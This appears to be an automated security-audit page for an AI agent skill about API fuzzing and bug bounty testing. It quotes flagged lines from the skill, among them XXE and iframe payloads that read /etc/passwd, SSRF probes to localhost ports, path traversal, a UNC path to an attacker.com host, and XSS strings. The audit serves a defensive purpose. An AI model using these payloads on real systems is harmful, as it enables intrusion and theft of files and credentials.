api-fuzzing-bug-bounty

Provides techniques for testing API security, identifying vulnerabilities, and conducting penetration testing for REST, SOAP, and GraphQL APIs.

Security score: 53/100

The api-fuzzing-bug-bounty skill was audited on May 12, 2026 and we found 15 security issues across 3 threat categories, including 2 high-severity. Review the findings below before installing.

Security Issues

medium line 421

Curl to non-GitHub URL

Source: SKILL.md, line 421
curl -X POST https://target.com/graphql \

high line 142

Access to /etc/passwd

Source: SKILL.md, line 142
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

high line 299

Access to /etc/passwd

Source: SKILL.md, line 299
<iframe src="file:///etc/passwd" height=1000 width=800>

low line 61

External URL reference

Source: SKILL.md, line 61
kr scan https://target.com -w routes-large.kite

low line 148

External URL reference

Source: SKILL.md, line 148
<object data="http://127.0.0.1:8443"/>

low line 149

External URL reference

Source: SKILL.md, line 149
<img src="http://127.0.0.1:445"/>

low line 157

External URL reference

Source: SKILL.md, line 157
https://example.org/download?filename=a.png

low line 158

External URL reference

Source: SKILL.md, line 158
https://example.org/download?filename=C:\inetpub\wwwroot\web.config

low line 159

External URL reference

Source: SKILL.md, line 159
https://example.org/download?filename=\\smb.dns.attacker.com\a.png

low line 253

External URL reference

Source: SKILL.md, line 253
http://target.com/graphql?query={user(name:"<script>alert(1)</script>"){id}}

low line 256

External URL reference

Source: SKILL.md, line 256
http://target.com/example?id=%C/script%E%Cscript%Ealert('XSS')%C/script%E

low line 302

External URL reference

Source: SKILL.md, line 302
<object data="http://127.0.0.1:8443"/>

low line 305

External URL reference

Source: SKILL.md, line 305
<img src="http://127.0.0.1:445"/>

low line 308

External URL reference

Source: SKILL.md, line 308
<img src="https://iplogger.com/yourcode.gif"/>

low line 421

External URL reference

Source: SKILL.md, line 421
curl -X POST https://target.com/graphql \

Scanned on May 12, 2026